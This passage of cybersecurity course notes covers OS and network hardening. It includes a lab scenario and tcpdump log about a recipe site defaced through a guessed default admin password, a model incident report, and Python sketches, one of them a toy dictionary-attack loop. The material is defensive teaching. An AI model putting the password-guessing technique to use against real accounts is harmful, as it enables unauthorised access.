server with SYN packets
Module 4 – Security Hardening
I want to take a moment to congratulate you on your progress so far. First, you learned about
network operations. Then, you learned about the tools and protocols that help network systems
function. Next, you learned how vulnerabilities in networks expose them to various security
intrusions. Now, we'll discuss security hardening. Then, we'll learn about OS hardening, explore
network hardening practices, and discuss cloud hardening practices. Security hardening can be
implemented in devices, networks, applications, and cloud infrastructure. Security analysts may
perform tasks, such as patch updates and backups, as part of security hardening. We'll discuss these
tasks as you progress through the course. As a security analyst, hardening will play a major role in
your day-to-day tasks, which is why it's important for you to understand how it works.
Security analysts and the organizations they work with must be proactive about protecting
systems from attack. This is where security hardening comes in. Security hardening is the process
of strengthening a system to reduce its vulnerability and attack surface. All the potential
vulnerabilities that a threat actor could exploit are referred to as a system's attack surface. Let's use
an example that compares a network to a house. The attack surface would be all the doors and
windows that a robber could use to gain access to that house. Just like putting locks on all the doors
and windows in the house, security hardening involves
minimizing the attack surface or potential vulnerabilities and keeping a network as secure as
possible. As part of security hardening, security analysts perform regular maintenance procedures
to keep network devices and systems functioning securely and optimally. Security hardening can be
conducted on any device or system that can be compromised, such as hardware, operating systems,
applications, computer networks, and databases. Physical security is also a part of security
hardening. This may include securing a physical space with security cameras and security guards.
Some common types of hardening procedures include software updates, also called patches, and
device application configuration changes. These updates and changes are done to increase security
and fix security vulnerabilities on a network. An example of a security configuration change would
be requiring longer passwords or
more frequent password changes. This makes it harder for a malicious actor to gain login
credentials. An example of a configuration check is updating the encryption standards for data that is
stored in a database. Keeping encryption up to date makes it harder for malicious actors to access
the database. Other examples of security hardening include removing or disabling unused
applications and services, disabling unused ports, and reducing access permissions across devices
and networks. Minimizing the number of applications,
devices, ports, and access permissions makes network and device monitoring more efficient and
reduces the overall attack surface, which is one of the best ways to secure an organization. Another
important strategy for security hardening is to conduct regular penetration testing. A penetration
test, also called a pen test, is a simulated attack that helps identify vulnerabilities in a system,
network, website, application, or process. Penetration testers document their findings in a report.
Depending on where the test fails, security teams can determine the type of security vulnerabilities
that require fixing. Organizations can then review these vulnerabilities and come up with a plan to
fix them. Coming up, you'll learn more about how security hardening is an essential aspect of
securing networks. It's a foundational part of
network security that strengthens the network to reduce the number of successful attacks.
OS Hardening
The operating system is the interface between computer hardware and the user. The OS is the first
program loaded when a computer turns on. The OS acts as an intermediary between software
applications and the computer hardware. It's important to secure the OS in each system because
one insecure OS can lead to a whole network being compromised. There are many types of
operating systems, and they all share similar security hardening practices. Let's talk about some of
those security hardening practices that are recommended to secure an OS. Some OS hardening
tasks are performed at regular intervals, like updates, backups, and keeping an up-to-date list of
devices and authorized users. Other tasks are performed only once as part of preliminary safety
measures. One example would be configuring a device setting to fit a secure encryption standard.
Let's begin with OS hardening tasks that are performed at a regular interval, such as patch
installation, also known as patch updates. A patch update is a software and operating system, or OS,
update that addresses security vulnerabilities within a program or product. Now we'll discuss patch
updates provided to the company by the OS software vendor. With patch updates, the OS should be
upgraded to its latest software version. Sometimes patches are released to fix a security
vulnerability in the software. As soon as OS vendors publish a patch and the vulnerability fix,
malicious actors know exactly where the vulnerability is in systems running the out-of-date OS.
This is why it's important for organizations to run patch updates as soon as they are released. For
example, my team had to perform an emergency patch to address a recent vulnerability found in a
commonly used programming library. The library is used almost everywhere, so we had to quickly
patch most of our servers and applications to fix the vulnerability. The newly updated OS should be
added to the baseline configuration, also called the baseline image. A baseline configuration is a
documented set of specifications within a system that is used as a basis for future builds, releases,
and updates. For example, a baseline may contain a firewall rule with a list of allowed and
disallowed network ports. If a security team suspects unusual activity affecting the OS, they can
compare the current configuration to the baseline and make sure that nothing has been changed.
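As an illustration of that comparison, the sketch below diffs a current configuration against a documented baseline. The configuration keys and values are hypothetical; real baselines cover far more settings.

```python
# Sketch: compare a system's current settings against a documented baseline
# configuration and report anything that changed. Keys are hypothetical.
def diff_against_baseline(baseline, current):
    changes = {}
    for key in baseline:
        if current.get(key) != baseline[key]:
            # Record (expected, actual) for each drifted setting.
            changes[key] = (baseline[key], current.get(key))
    return changes

baseline = {"allowed_ports": (22, 443), "firewall": "on", "ssh_root_login": "no"}
current  = {"allowed_ports": (22, 443, 8080), "firewall": "on", "ssh_root_login": "no"}
print(diff_against_baseline(baseline, current))
# → {'allowed_ports': ((22, 443), (22, 443, 8080))}
```

An unexpected open port like 8080 in the diff is the kind of deviation a security team would investigate.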
Another hardening task performed regularly is hardware and software disposal. This ensures that all
old hardware is properly wiped and disposed of. It's also a good idea to delete any unused software
applications since some popular programming languages have known vulnerabilities. Removing
unused software makes sure that there aren't any unnecessary vulnerabilities connected with the
programs that the software uses. The final OS hardening technique that we'll discuss is
implementing a strong password policy. Strong password policies require that passwords follow
specific rules. For example, an organization may set a password policy that requires a minimum of
eight characters, a capital letter, a number, and a symbol. To discourage malicious actors, a
password policy usually states that a user will lose access to the network after entering the wrong
password a certain number of times in a row. Some systems also require multi-factor
authentication, or MFA. MFA is a security measure which requires a user to verify their identity in
two or more ways to access a system or network. Ways of identifying yourself include something
you know, like a password, something you have like an ID card, or something unique about you, like
your fingerprint. To review, OS hardening is a set of procedures that maintains OS security and
improves it. Security measures like access privileges and password policies frequently undergo
regular security checks as part of OS hardening.
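The example password policy mentioned above (a minimum of eight characters, a capital letter, a number, and a symbol) could be checked with a few lines of Python. This is an illustrative sketch, not a complete policy engine.

```python
# Sketch of the password policy described above: minimum eight characters,
# at least one capital letter, one number, and one symbol.
import string

def meets_policy(password):
    return (len(password) >= 8
            and any(c.isupper() for c in password)
            and any(c.isdigit() for c in password)
            and any(c in string.punctuation for c in password))

print(meets_policy("Tr1cky!pass"))  # → True
print(meets_policy("password"))     # → False (no capital, number, or symbol)
```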
Brute force attacks and OS hardening
In this reading, you’ll learn about brute force attacks. You’ll consider how vulnerabilities can be assessed
using virtual machines and sandboxes and learn ways to prevent brute force attacks using a
combination of authentication measures. Implementing various OS hardening tasks can help prevent
brute force attacks. An attacker can use a brute force attack to gain access and compromise a network.
Usernames and passwords are among the most common and important security controls in place today.
They are used and enforced on everything that stores or accesses sensitive or private information, like
personal phones, computers, and restricted applications within an organization. However, a major issue
with relying on login credentials as a critical line of defense is that they’re vulnerable to being stolen and
guessed by malicious actors.
Brute force attacks
A brute force attack is a trial-and-error process of discovering private information. There are different
types of brute force attacks that malicious actors use to guess passwords, including:
● Simple brute force attacks. When attackers try to guess a user's login credentials, it’s considered a simple brute force attack. They might do this by entering any combination of usernames and passwords that they can think of until they find the one that works.
● Dictionary attacks use a similar technique. In dictionary attacks, attackers use a list of commonly used passwords and stolen credentials from previous breaches to access a system. These are called “dictionary” attacks because attackers originally used a list of words from the dictionary to guess the passwords, before complex password rules became a common security practice.
Using brute force to access a system can be a tedious and time-consuming process, especially when
it’s done manually. There is a range of tools attackers use to conduct their attacks.
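To make the idea concrete, here is a toy sketch of a dictionary attack loop. The wordlist and the check function are hypothetical stand-ins; it is shown only to illustrate why limiting login attempts and banning common passwords are effective defenses.

```python
# Sketch: how a dictionary attack works in principle. Real attackers use far
# larger lists of common and previously breached passwords.
def dictionary_attack(wordlist, check_password):
    for attempt, candidate in enumerate(wordlist, start=1):
        if check_password(candidate):
            return candidate, attempt   # guessed password, number of tries
    return None, len(wordlist)

wordlist = ["123456", "password", "qwerty", "letmein"]
guess, tries = dictionary_attack(wordlist, lambda p: p == "qwerty")
print(guess, tries)  # → qwerty 3
```

A weak or default password falls to this loop in a handful of tries, which is why the prevention measures below matter.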
Assessing vulnerabilities
Before a brute force attack or other cybersecurity incident occurs, companies can run a series of tests on
their network or web applications to assess vulnerabilities. Analysts can use virtual machines and
sandboxes to test suspicious files, check for vulnerabilities before an event occurs, or to simulate a
cybersecurity incident.
Virtual machines (VMs)
Virtual machines (VMs) are software versions of physical computers. VMs provide an additional layer of
security for an organization because they can be used to run code in an isolated environment,
preventing malicious code from affecting the rest of the computer or system. VMs can also be deleted
and replaced by a pristine image after testing malware.
VMs are useful when investigating potentially infected machines or running malware in a constrained
environment. Using a VM may prevent damage to your system in the event its tools are used improperly.
VMs also give you the ability to revert to a previous state. However, there are still some risks involved
with VMs. There’s still a small risk that a malicious program can escape virtualization and access the
host machine.
You can test and explore applications easily with VMs, and it’s easy to switch between different VMs
from your computer. This can also help in streamlining many security tasks.
Sandbox environments
A sandbox is a type of testing environment that allows you to execute software or programs separate
from your network. They are commonly used for testing patches, identifying and addressing bugs, or
detecting cybersecurity vulnerabilities. Sandboxes can also be used to evaluate suspicious software,
evaluate files containing malicious code, and simulate attack scenarios.
Sandboxes can be stand-alone physical computers that are not connected to a network; however, it is
often more time- and cost-effective to use software or cloud-based virtual machines as sandbox
environments. Note that some malware authors know how to write code to detect if the malware is
executed in a VM or sandbox environment. Attackers can program their malware to behave as harmless
software when run inside these types of testing environments.
Prevention measures
Some common measures organizations use to prevent brute force attacks and similar attacks from
occurring include:
● Salting and hashing: Hashing converts information into a unique value that can then be used to determine its integrity. It is a one-way function, meaning it is impossible to decrypt and obtain the original text. Salting adds random characters to hashed passwords. This increases the length and complexity of hash values, making them more secure.
● Multi-factor authentication (MFA) and two-factor authentication (2FA): MFA is a security measure which requires a user to verify their identity in two or more ways to access a system or network. This verification happens using a combination of authentication factors: a username and password, fingerprints, facial recognition, or a one-time password (OTP) sent to a phone number or email. 2FA is similar to MFA, except it uses only two forms of verification.
● CAPTCHA and reCAPTCHA: CAPTCHA stands for Completely Automated Public Turing test to tell Computers and Humans Apart. It asks users to complete a simple test that proves they are human. This helps prevent software from trying to brute force a password. reCAPTCHA is a free CAPTCHA service from Google that helps protect websites from bots and malicious software.
● Password policies: Organizations use password policies to standardize good password practices throughout the business. Policies can include guidelines on how complex a password should be, how often users need to update passwords, and if there are limits to how many times a user can attempt to log in before their account is suspended.
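The salting-and-hashing measure above can be sketched with Python's standard library. Note this is a simplified illustration: production systems should use a deliberately slow key-derivation function such as PBKDF2, bcrypt, or scrypt rather than a single SHA-256 pass.

```python
# Sketch of salting and hashing. The salt is random, so two users with the
# same password end up with different hash values.
import hashlib
import os

def hash_password(password, salt=None):
    salt = salt if salt is not None else os.urandom(16)  # 16 random bytes
    digest = hashlib.sha256(salt + password.encode()).hexdigest()
    return salt, digest

def verify_password(password, salt, expected_digest):
    # Re-hash the candidate with the stored salt and compare digests.
    return hash_password(password, salt)[1] == expected_digest

salt, digest = hash_password("Tr1cky!pass")
print(verify_password("Tr1cky!pass", salt, digest))   # → True
print(verify_password("wrong-guess", salt, digest))   # → False
```

Because only the salt and digest are stored, a stolen credential database does not directly reveal the original passwords.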
Key takeaways
Brute force attacks are a trial-and-error process of guessing passwords. Attacks can be launched
manually or through software tools. Methods include simple brute force attacks and dictionary attacks.
To protect against brute force attacks, cybersecurity analysts can use sandboxes to test suspicious files,
check for vulnerabilities, or to simulate real attacks and virtual machines to conduct vulnerability tests.
Some common measures to prevent brute force attacks include: hashing and salting, MFA and/or 2FA,
CAPTCHA and reCAPTCHA, and password policies.
Activity Overview
In this activity, you will take on the role of a cybersecurity analyst working for a company that hosts the
cooking website, yummyrecipesforme.com. Visitors to the website experience a security issue when
loading the main webpage. Your job is to investigate, identify, document, and recommend a solution to
the security problem.
When investigating the security event, you will review a tcpdump log. You will need to identify the
network protocols used to establish the connection between the user and the website. Network
protocols are the communication rules and standards networked devices use to transmit data.
Unfortunately, malicious actors can also use network protocols to invade and attack private networks.
Knowing how to identify the protocols commonly used in attacks will help you protect your
organization’s network against these types of security events.
To complete the assignment, you will also need to document what occurred during the security incident.
Then, you will recommend one security measure to implement to prevent similar security problems in
the future.
Be sure to complete this activity before moving on. The next course item will provide you with a
completed exemplar to compare to your own work.
Scenario
Review the scenario below. Then complete the step-by-step instructions.
You are a cybersecurity analyst for yummyrecipesforme.com, a website that sells recipes and
cookbooks. A disgruntled baker has decided to publish the website’s best-selling recipes for the public to
access for free.
The baker executed a brute force attack to gain access to the web host. They repeatedly entered several
known default passwords for the administrative account until they correctly guessed the right one. After
they obtained the login credentials, they were able to access the admin panel and change the website’s
source code. They embedded a JavaScript function in the source code that prompted visitors to
download and run a file upon visiting the website. After running the downloaded file, the customers are
redirected to a fake version of the website where the seller’s recipes are now available for free.
Several hours after the attack, multiple customers emailed yummyrecipesforme’s helpdesk. They
complained that the company’s website had prompted them to download a file to update their browsers.
The customers claimed that, after running the file, the address of the website changed and their personal
computers began running more slowly.
In response to this incident, the website owner tries to log in to the admin panel but is unable to, so they
reach out to the website hosting provider. You and other cybersecurity analysts are tasked with
investigating this security event.
To address the incident, you create a sandbox environment to observe the suspicious website behavior.
You run the network protocol analyzer tcpdump, then type in the URL for the website,
yummyrecipesforme.com. As soon as the website loads, you are prompted to download an executable
file to update your browser. You accept the download and allow the file to run. You then observe that
your browser redirects you to a different URL, greatrecipesforme.com, which is designed to look like the
original site. However, the recipes your company sells are now posted for free on the new website.
The logs show the following process:
1. The browser requests a DNS resolution of the yummyrecipesforme.com URL.
2. The DNS replies with the correct IP address.
3. The browser initiates an HTTP request for the webpage.
4. The browser initiates the download of the malware.
5. The browser requests another DNS resolution for greatrecipesforme.com.
6. The DNS server responds with the new IP address.
7. The browser initiates an HTTP request to the new IP address.
A senior analyst confirms that the website was compromised. The analyst checks the source code for the
website. They notice that JavaScript code had been added to prompt website visitors to download an
executable file. Analysis of the downloaded file found a script that redirects the visitors’ browsers from
yummyrecipesforme.com to greatrecipesforme.com.
The cybersecurity team reports that the web server was impacted by a brute force attack. The
disgruntled baker was able to guess the password easily because the admin password was still set to the
default password. Additionally, there were no controls in place to prevent a brute force attack.
Your job is to document the incident in detail, including identifying the network protocols used to
establish the connection between the user and the website. You should also recommend a security
action to take to prevent brute force attacks in the future.
Step 1: Access the template
Link to template:
● Security incident report template
Step 2
Links to supporting materials:
● DNS & HTTP traffic log
● How to read the DNS & HTTP log
Step 3
Imagine that you are one of the cybersecurity analysts in this scenario and you are tasked with
writing an incident report for this security event. Using the DNS & HTTP log file you produced with
tcpdump, determine which network protocol is identified in the packet captures during the
investigation. You will use what you learned about the four layers of the TCP/IP model and which
protocols happen at each layer. If needed, you can review the video and reading about the TCP/IP
model to use as guides for your response. Then review the DNS & HTTP traffic log and record which
protocol you identified in the first section of the security incident report template.
Step 4
Summarize the incident in the second section of the report. Provide as many details and
facts as possible in your documentation. When writing the documentation, be sure to:
● Avoid using strong emotional language (good, terrible, awful, etc.).
● Include as many facts about the issue as you can, including where the incident occurred, how it happened, whether anyone witnessed it, how it was discovered, etc.
● Indicate your sources for information and evidence.
Writing accurate and detailed documentation for cybersecurity incidents can serve as a
reference point for other cybersecurity analysts. Additionally, quality documentation can
be used to educate other employees about cybersecurity measures taken within the
company when incidents occur and can help businesses comply with various security
audits.
Step 5
After documenting the incident, write one recommendation to help your organization
prevent brute force attacks in the future.
Some of the common security methods used to prevent brute force attacks include:
● Requiring strong passwords
● Enforcing two-factor authentication (2FA)
● Monitoring login attempts
● Limiting the number of login attempts
Select one security measure and explain why it is effective in section three of the security
incident report template.
The more safety measures that are in place, the less likely a malicious actor will be able to
access sensitive information.
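One of the measures listed above, limiting the number of login attempts, can be sketched in a few lines. This is a minimal illustration of the idea, not a production lockout mechanism; the threshold of five attempts and the function names are assumptions chosen for the example.

```python
# Minimal sketch of limiting login attempts to slow brute force attacks.
# The threshold of 5 consecutive failures is an illustrative choice.
MAX_ATTEMPTS = 5

failed_attempts = {}  # username -> count of consecutive failed logins

def record_failure(username):
    """Record a failed login; return True if the account is now locked."""
    failed_attempts[username] = failed_attempts.get(username, 0) + 1
    return failed_attempts[username] >= MAX_ATTEMPTS

def record_success(username):
    """A successful login resets the failure counter."""
    failed_attempts.pop(username, None)

# A brute force attempt: repeated failures eventually lock the account.
for _ in range(4):
    locked = record_failure("admin")
print(locked)                   # False: four failures, still below the limit
print(record_failure("admin"))  # True: the fifth failure locks the account
```

A real implementation would also persist the counters and apply a lockout duration, but the core idea is the same: each failure is counted, and the account is blocked once the threshold is reached.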
What to Include in Your Response
● Name one network protocol identified during the investigation
● Document the incident
● Recommend one security measure
How to read the DNS & HTTP traffic log
This reading explains how to identify the brute force attack using tcpdump.
14:18:32.192571 IP your.machine.52444 > dns.google.domain: 35084+ A?
yummyrecipesforme.com. (24)
14:18:32.204388 IP dns.google.domain > your.machine.52444: 35084 1/0/0 A 203.0.113.22 (40)
The first section of the DNS & HTTP traffic log file shows the source computer
(your.machine.52444) using port 52444 to send a DNS resolution request to the DNS server
(dns.google.domain) for the destination URL (yummyrecipesforme.com). Then the reply comes back
from the DNS server to the source computer with the IP address of the destination URL
(203.0.113.22).
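The query and its answer can be pulled out of these two lines programmatically. The sketch below uses regular expressions against the exact log lines shown above; the patterns assume tcpdump's default output format for an A query and its reply.

```python
import re

# Extract the queried domain and the answered IP from the two tcpdump
# DNS lines shown above (default tcpdump output format assumed).
query = ("14:18:32.192571 IP your.machine.52444 > dns.google.domain: "
         "35084+ A? yummyrecipesforme.com. (24)")
reply = ("14:18:32.204388 IP dns.google.domain > your.machine.52444: "
         "35084 1/0/0 A 203.0.113.22 (40)")

domain = re.search(r"A\? (\S+)\.", query).group(1)               # name being resolved
address = re.search(r" A (\d+\.\d+\.\d+\.\d+)", reply).group(1)  # answer record

print(domain, "resolves to", address)
# yummyrecipesforme.com resolves to 203.0.113.22
```

Parsing log lines like this is how an analyst might automate the check across a long capture instead of reading each line by hand.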
14:18:36.786501 IP your.machine.36086 > yummyrecipesforme.com.http: Flags [S], seq
2873951608, win 65495, options [mss 65495,sackOK,TS val 3302576859 ecr 0,nop,wscale 7],
length 0
14:18:36.786517 IP yummyrecipesforme.com.http > your.machine.36086: Flags [S.], seq
3984334959, ack 2873951609, win 65483, options [mss 65495,sackOK,TS val 3302576859 ecr
3302576859,nop,wscale 7], length 0
The next section shows the source computer sending a connection request (Flags [S]) from the
source computer (your.machine.36086) using port 36086 directly to the destination
(yummyrecipesforme.com.http). The .http suffix identifies the port by its service name; HTTP is commonly associated with port 80. The reply shows the destination acknowledging it received the connection request
(Flags [S.]). The communication between the source and the intended destination continues for
about 2 minutes, according to the timestamps between this block (14:18) and the next DNS
resolution request (see below for the 14:20 timestamp).
TCP Flag codes include:
Flags [S] - Connection Start
Flags [F] - Connection Finish
Flags [P] - Data Push
Flags [R] - Connection Reset
Flags [.] - Acknowledgment
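The flag codes above can be turned into a small lookup so that any captured line can be decoded at a glance. This is an illustrative sketch; the function name and descriptions are choices made for the example, and the regex assumes tcpdump's default `Flags [...]` output.

```python
import re

# Map the tcpdump flag codes listed above to their meanings.
FLAG_MEANINGS = {
    "S": "Connection Start (SYN)",
    "F": "Connection Finish (FIN)",
    "P": "Data Push",
    "R": "Connection Reset",
    ".": "Acknowledgment (ACK)",
}

def describe_flags(log_line):
    """Return a human-readable description of the Flags [...] field."""
    match = re.search(r"Flags \[([^\]]+)\]", log_line)
    if not match:
        return "no flags found"
    return ", ".join(FLAG_MEANINGS.get(code, "unknown") for code in match.group(1))

line = "14:18:36.786517 IP yummyrecipesforme.com.http > your.machine.36086: Flags [S.]"
print(describe_flags(line))  # Connection Start (SYN), Acknowledgment (ACK)
```

Applied to the reply above, `Flags [S.]` decodes as a SYN plus an ACK, which is the second step of the TCP three-way handshake.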
14:18:36.786589 IP your.machine.36086 > yummyrecipesforme.com.http: Flags [P.], seq 1:74,
ack 1, win 512, options [nop,nop,TS val 3302576859 ecr 3302576859], length 73: HTTP: GET /
HTTP/1.1
The log entry with the code HTTP: GET / HTTP/1.1 shows the browser is requesting data from
yummyrecipesforme.com with the HTTP: GET method using HTTP protocol version 1.1. This could
be the download request for the malicious file.
14:20:32.192571 IP your.machine.52444 > dns.google.domain: 21899+ A?
greatrecipesforme.com. (24)
14:20:32.204388 IP dns.google.domain > your.machine.52444: 21899 1/0/0 A 192.0.2.172 (40)
14:25:29.576493 IP your.machine.56378 > greatrecipesforme.com.http: Flags [S], seq
1020702883, win 65495, options [mss 65495,sackOK,TS val 3302989649 ecr 0,nop,wscale 7],
length 0
14:25:29.576510 IP greatrecipesforme.com.http > your.machine.56378: Flags [S.], seq
1993648018, ack 1020702884, win 65483, options [mss 65495,sackOK,TS val 3302989649 ecr
3302989649,nop,wscale 7], length 0
Then, a sudden change happens in the logs. The traffic is routed from the source computer to the
DNS server again using port 52444 (your.machine.52444 > dns.google.domain) to make another
DNS resolution request. This time, the DNS server responds with a new IP address
(192.0.2.172) for a different URL (greatrecipesforme.com). The traffic changes to a route
between the source computer and the spoofed website (outgoing traffic: IP your.machine.56378 >
greatrecipesforme.com.http and incoming traffic: greatrecipesforme.com.http > IP
your.machine.56378). Note that the port number (.56378) on the source computer has changed
again when redirected to a new website.
Resources for more information
● An introduction to using tcpdump at the Linux command line: Lists several tcpdump commands with example output. The article describes the data in the output and explains why it is useful.
● tcpdump Cheat Sheet: Lists tcpdump commands, packet capturing options, output options, protocol codes, and filter options.
● What is a computer port? | Ports in networking: Provides a short list of the most common ports for network traffic and their associated protocols. The article also provides information about ports in general and using firewalls to block ports.
● Service Name and Transport Protocol Port Number Registry: Provides a database of port numbers with their service names, transport protocols, and descriptions.
● How to Capture and Analyze Network Traffic with tcpdump?: Provides several tcpdump commands with example output. Then, the article describes each data element in examples of tcpdump output.
● Masterclass – Tcpdump – Interpreting Output: Provides a color-coded reference guide to tcpdump output.
Activity Exemplar: Apply OS hardening techniques
Section 1: Identify the network protocol involved in the incident
The protocol involved in the incident is the Hypertext Transfer Protocol (HTTP). Running
tcpdump while accessing the yummyrecipesforme.com website captured the protocol and
traffic activity in a DNS & HTTP traffic log file, which provided the evidence needed to
reach this conclusion. The malicious file was observed being transported to the users’
computers using the HTTP protocol at the application layer.
Section 2: Document the incident
Several customers contacted the website owner stating that when they visited the
website, they were prompted to download and run a file that asked them to update their
browsers. Their personal computers have been operating slowly ever since. The website
owner tried logging into the web server but noticed they were locked out of their
account.
The cybersecurity analyst used a sandbox environment to test the website without
impacting the company network. Then, the analyst ran tcpdump to capture the network
and protocol traffic packets produced by interacting with the website. The analyst was
prompted to download a file claiming it would update the user’s browser, accepted the
download and ran it. The browser then redirected the analyst to a fake website
(greatrecipesforme.com) that looked identical to the original site
(yummyrecipesforme.com).
The cybersecurity analyst inspected the tcpdump log and observed that the browser
initially requested the IP address for the yummyrecipesforme.com website. Once the
connection with the website was established over the HTTP protocol, the analyst recalled
downloading and executing the file. The logs showed a sudden change in network traffic
as the browser requested a new IP resolution for the greatrecipesforme.com URL. The
network traffic was then rerouted to the new IP address for the greatrecipesforme.com
website.
The senior cybersecurity professional analyzed the source code for the websites and the
downloaded file. The analyst discovered that an attacker had manipulated the website to
add code that prompted the users to download a malicious file disguised as a browser
update. Since the website owner stated that they had been locked out of their
administrator account, the team believes the attacker used a brute force attack to access
the account and change the admin password. The execution of the malicious file
compromised the end users’ computers.
Section 3: Recommend one remediation for brute force attacks
One security measure the team plans to implement to protect against brute force attacks
is two-factor authentication (2FA). This 2FA plan will include an additional requirement
for users to validate their identification by confirming a one-time password (OTP) sent to
either their email or phone. Once the user confirms their identity through their login
credentials and the OTP, they will gain access to the system. Any malicious actor that
attempts a brute force attack will not likely gain access to the system because it requires
additional authorization.
Note: The exemplar represents one possible explanation for the issues that the end users
are facing. Yours will likely differ in certain ways. What’s important is that you identified
the network protocols involved and created a report. In your role as a security analyst, you
and your team would document any issue that occurs on the network and come up with
solutions to help prevent the same issues from occurring in the future. Good quality
documentation can save you and your organization time and potentially help you manage an
attack early on.
First, analyze the DNS & HTTP traffic log to identify a network protocol. Then, document
the cybersecurity incident. Finally, recommend one security measure your organization
could implement to prevent brute force attacks in the future. Creating this process will, in
turn, help improve the organization’s security posture.
The exemplar accompanies the activity and presents a professional documentation
example that includes the following:
● One network protocol identified during the investigation
● Documentation of the incident
● A recommended security measure
Key Takeaways
As a security analyst, you might not always know exactly what the primary cause of a
network issue or a possible attack is. But being able to analyze the protocols involved will
help you make an informed assumption about what happened. This will allow you and your
team to begin resolving the issue.
Quick Explanation on the difference between HTTP Protocol and DNS Protocol
DNS (Domain Name System) and HTTP (Hypertext Transfer Protocol) are two fundamental protocols
used in computer networks, but they serve different purposes and operate at different layers of the
network stack. Here's a breakdown of the key differences between DNS and HTTP:
**1. Purpose:**
- **DNS (Domain Name System):**
- Purpose: DNS is primarily used to translate human-readable domain names (e.g., www.example.com)
into IP addresses (e.g., 192.168.1.1) that computers can use to locate and communicate with web
servers.
- Function: It acts as a distributed database system for translating domain names into IP addresses,
making it easier for users to access websites using memorable domain names.
- **HTTP (Hypertext Transfer Protocol):**
- Purpose: HTTP is a protocol used for fetching web pages and other resources from web servers. It
facilitates the transfer of data, including text, images, videos, and more, between a web client (usually a
web browser) and a web server.
- Function: It defines how data should be structured and transmitted, allowing web browsers to request
web pages and servers to respond with the requested content.
**2. Layer:**
- **DNS:**
- DNS operates at the **Application Layer** of the OSI model (Layer 7). It is part of the application layer
because it provides a service (domain name resolution) to applications like web browsers.
- **HTTP:**
- HTTP also operates at the **Application Layer** of the OSI model (Layer 7). It is responsible for
managing the communication between web clients and servers.
**3. Operation:**
- **DNS:**
- DNS is a hierarchical and distributed system that consists of DNS servers worldwide. When a user
enters a domain name in a web browser, the browser queries a DNS server to resolve the domain into an
IP address. DNS servers then recursively search for the IP address associated with the domain and
return it to the browser.
- **HTTP:**
- HTTP operates as a request-response protocol. A web browser (the client) sends an HTTP request to a
web server, specifying the desired resource (e.g., a web page). The web server processes the request and
sends an HTTP response back to the client with the requested content.
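The request-response exchange described above can be made concrete by looking at the raw message a browser sends. This sketch simply builds the request as a string, matching the "GET / HTTP/1.1" entry seen earlier in the tcpdump log; the Host value echoes the scenario's site, and no network call is made.

```python
# What the browser's HTTP/1.1 GET request looks like on the wire.
# Header lines end with CRLF, and a blank line ends the header section.
request = (
    "GET / HTTP/1.1\r\n"               # method, path, protocol version
    "Host: yummyrecipesforme.com\r\n"  # which site the client wants
    "Connection: close\r\n"
    "\r\n"                             # blank line: end of headers
)
print(request.splitlines()[0])  # GET / HTTP/1.1
```

The server's response follows the same text-based structure: a status line (such as `HTTP/1.1 200 OK`), headers, a blank line, and then the requested content.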
**4. Interaction:**
- **DNS:**
- DNS is typically a background process that operates behind the scenes. Users may not directly interact
with DNS, but it plays a crucial role in enabling web browsing by translating domain names into IP
addresses.
- **HTTP:**
- HTTP is directly used by web clients (browsers) to request and retrieve web content. Users interact
with web pages through HTTP when they click on links, submit forms, or perform other web-related
actions.
In summary, DNS and HTTP are both essential protocols for the functioning of the internet, but they
serve distinct purposes. DNS is responsible for translating domain names into IP addresses, while HTTP
is responsible for fetching and displaying web content. Together, they enable users to access websites
using easy-to-remember domain names and interact with web servers to retrieve web pages and other
resources.
Network Hardening
Earlier, you learned that OS hardening focuses on device safety and uses patch updates, secure
configuration, and account access policies. Now we'll focus on network hardening. Network
hardening focuses on network-related security hardening, like port filtering, network access
privileges, and encryption over networks. Certain network hardening tasks are performed regularly,
while others are performed once and then updated as needed. Some tasks that are regularly
performed are firewall rules maintenance, network log analysis, patch updates, and server backups.
Earlier, you learned that a log is a record of events that occurs within an organization's systems.
Network log analysis is the process of examining network logs to identify events of interest.
Security teams use a log analyzer tool or a security information and event management tool, also
known as a SIEM, to conduct network log analysis. A SIEM tool is an application that collects and
analyzes log data to monitor critical activities in an organization. It gathers security data from a
network and presents that data on a single dashboard. The dashboard interface is sometimes called
a single pane of glass. A SIEM helps analysts to inspect, analyze, and react to security events across
the network based on their priority. Reports from the SIEM provide a list of new or ongoing network
vulnerabilities and list them on a scale of priority from high to low, where high priority
vulnerabilities have a much shorter deadline for mitigation. Now that we've covered tasks that are
performed regularly, let's examine tasks that are performed once. These tasks include port filtering
on firewalls, network access privileges, and encryption for communication, among many things. Let's
start with port filtering, which is performed over the network. Port filtering is a firewall function
that blocks or allows certain port numbers to limit unwanted communication. A basic principle is
that only the ports that are needed should be allowed. Any port that isn't being used by normal network operations
should be disallowed. This protects against port vulnerabilities. Networks should be set up with the
most up-to-date wireless protocols available and older wireless protocols
should be disabled. Security analysts also use network segmentation to create isolated subnets for
different departments in an organization. For example, they might make one for the marketing
department and one for the finance department. This is done so the issues in each subnet don't
spread across the whole company and only specified users are given access to the part of the
network that they require for their role. Network segmentation may also be used to separate
different security zones. Any restricted zone on a network containing highly classified or
confidential data should be separate from the rest of the network. Lastly, all network
communication should be encrypted using the latest encryption standards. Encryption standards are
rules or methods used to conceal outgoing data and uncover or decrypt incoming data. Data in
restricted zones should have much higher encryption standards, which makes them more difficult
to access. You've learned about the most common hardening practices.
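The port filtering principle described above (allow only what is needed, disallow everything else) can be sketched as a simple allowlist check. The specific ports and function name here are illustrative assumptions, not a configuration recommendation; real filtering is done in firewall rules, not application code.

```python
# Sketch of port filtering: only ports needed for normal operations are
# allowed; all other ports are disallowed by default.
ALLOWED_PORTS = {22, 53, 80, 443}  # SSH, DNS, HTTP, HTTPS (example allowlist)

def filter_packet(destination_port):
    """Return 'allow' for ports on the allowlist, 'deny' otherwise."""
    return "allow" if destination_port in ALLOWED_PORTS else "deny"

print(filter_packet(443))  # allow
print(filter_packet(23))   # deny (Telnet is not on the allowlist)
```

Note the default-deny posture: a port is blocked unless it has been explicitly allowed, which protects against vulnerabilities on unused ports.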
Network security applications
This section of the course covers the topic of network hardening and monitoring. Each device, tool, or
security strategy put in place by security analysts further protects—or hardens—the network until the
network owner is satisfied with the level of security. This approach of adding layers of security to a
network is referred to as defense in depth.
In this reading, you are going to learn about the role of four devices used to secure a network—firewalls,
intrusion detection systems, intrusion prevention systems, and security incident and event management
tools. Network security professionals have the choice to use any or all of these devices and tools
depending on the level of security that they hope to achieve.
This reading will discuss the benefits of layered security. Each tool mentioned is an additional layer of
defense that can incrementally harden a network, starting with the minimum level of security (provided
by just a firewall), to the highest level of security (provided by combining a firewall, an intrusion
detection and prevention device, and security event monitoring).
